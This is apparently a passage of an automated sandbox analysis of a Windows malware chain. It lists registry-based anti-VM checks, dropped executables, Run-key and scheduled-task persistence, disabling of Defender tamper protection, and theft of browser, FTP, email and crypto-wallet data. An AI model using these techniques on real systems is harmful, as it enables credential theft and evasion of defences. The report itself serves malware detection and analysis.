Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091747001\d7289d778f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091749001\4629fe53b0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\db4b761fdf.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091693101\\db4b761fdf.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091694021\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\skotes.job C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091749001\4629fe53b0.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091747001\d7289d778f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133848779747409536" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
